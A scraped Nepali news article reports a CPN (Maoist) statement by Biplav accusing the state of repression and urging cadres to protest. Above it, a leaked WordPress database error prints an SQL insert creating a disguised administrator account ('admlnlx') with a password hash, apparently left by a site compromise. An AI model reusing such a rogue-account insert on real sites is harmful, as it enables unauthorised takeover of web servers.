WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPSmuYw5bMO7A4BO2daOJxQ2dHQAVa/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 18:03:12', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २१-
नेत्रविक्रम चन्द विप्लव नेतृत्वको (नेकपा माओवादी) ले राज्यले आफूहरु विरुद्ध दमनको नीति लिएको भन्दै प्रतिवादमा उत्रिन पार्टीपंक्तिलाई अपिल गरेको छ। पार्टी महासचिव विप्लवले शुक्रबार विज्ञप्ति जारी गर्दै राज्यको रवैयाप्रति गम्भीर ध्यानाकर्षण भएको भन्दै प्रतिवादमा उत्रिन अपिल गरेका हुन्। ‘केही समयदेखि राज्यले हाम्रो पार्टीविरुद्ध धरपकड, दमन र भ्रामक प्रचार गर्दै आएको छ,’।
विप्लवले जारी गरेको विज्ञप्तिमा लेखिएको छ, ‘हिजो मन्त्रिपरिषदमा गृहमन्त्रीले हाम्रो पार्टीबाट राज्यलाई चुनौती भएको भन्दै पार्टीका गतिविधिमाथि नियन्त्रण गर्ने खालको प्रस्ताव गरेको प्रचार भएको छ, राज्यको यो रवैयाले हाम्रो ध्यान गम्भीर प्रकारले तानेको छ।’ उनले यस्तो कार्य तत्काल रोक्न सरकारलाई आग्रह गरेका छन् । ‘हाम्रो पार्टी प्रचण्ड सरकारलाई यस्तो जनघाती कार्य रोक्न र हामीले अगाडि बढाएका विषयमा गम्भीर हुन आग्रह गर्दछ,’ विज्ञप्तिमा भनिएको छ, ‘अन्यथा आउने परिस्थितिको जिम्मेवार राज्य नै हुने चेतावनी पनि दिन्छ।’ साथै उनले यसको भण्डाफोर र प्रतिरोधमा उत्रिन कार्यकर्तालाई अपिल पनि गरेका छन्। यस्तो छ विज्ञप्ति: